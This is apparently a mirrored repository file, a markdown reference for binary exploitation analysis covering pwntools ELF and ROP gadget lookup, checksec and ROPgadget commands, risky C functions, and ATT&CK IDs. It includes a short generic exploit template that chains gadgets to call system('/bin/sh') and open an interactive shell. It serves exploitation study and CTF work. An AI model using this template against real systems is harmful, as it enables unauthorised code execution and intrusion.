creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-11 21:54:56 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
220f49477a3cff8ff0df5bb887c32fdc435bf876
Anthropic-Cybersecurity-Skills/skills/performing-binary-exploitation-analysis/references/api-reference.md
T

1.7 KiB
Raw Blame History

API Reference: Binary Exploitation Analysis

pwntools (Python)

pip install pwntools

ELF Analysis

from pwn import ELF, ROP, context

elf = ELF('./vulnerable_binary')
print(elf.checksec())         # Security mitigations
print(hex(elf.sym['main']))   # Symbol address
print(hex(elf.plt['system'])) # PLT entry
print(hex(elf.got['puts']))   # GOT entry

# ROP gadget discovery
rop = ROP(elf)
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]

Exploit Template

from pwn import *

context.binary = elf = ELF('./vuln')
p = process('./vuln')  # or remote('host', port)
payload = flat(b'A' * offset, pop_rdi, next(elf.search(b'/bin/sh')), elf.plt['system'])
p.sendline(payload)
p.interactive()

checksec CLI

checksec --file ./binary
checksec --file ./binary --output json

Output Fields

Field Values Impact
NX Enabled/Disabled No shellcode on stack
PIE Enabled/Disabled Randomized addresses
Canary Found/Not found Stack smash detection
RELRO Full/Partial/None GOT write protection

ROPgadget CLI

# Find all gadgets
ROPgadget --binary ./vuln

# Search specific gadget
ROPgadget --binary ./vuln --only "pop|ret"

# Generate ROP chain
ROPgadget --binary ./vuln --ropchain

Dangerous Functions

Function Risk
gets() Unbounded stdin read
strcpy() No length check
sprintf() No length check
scanf() Possible overflow

MITRE ATT&CK

Technique Description
T1203 Exploitation for Client Execution
T1068 Exploitation for Privilege Escalation
T1211 Exploitation for Defense Evasion
Reference in New Issue View Git Blame Copy Permalink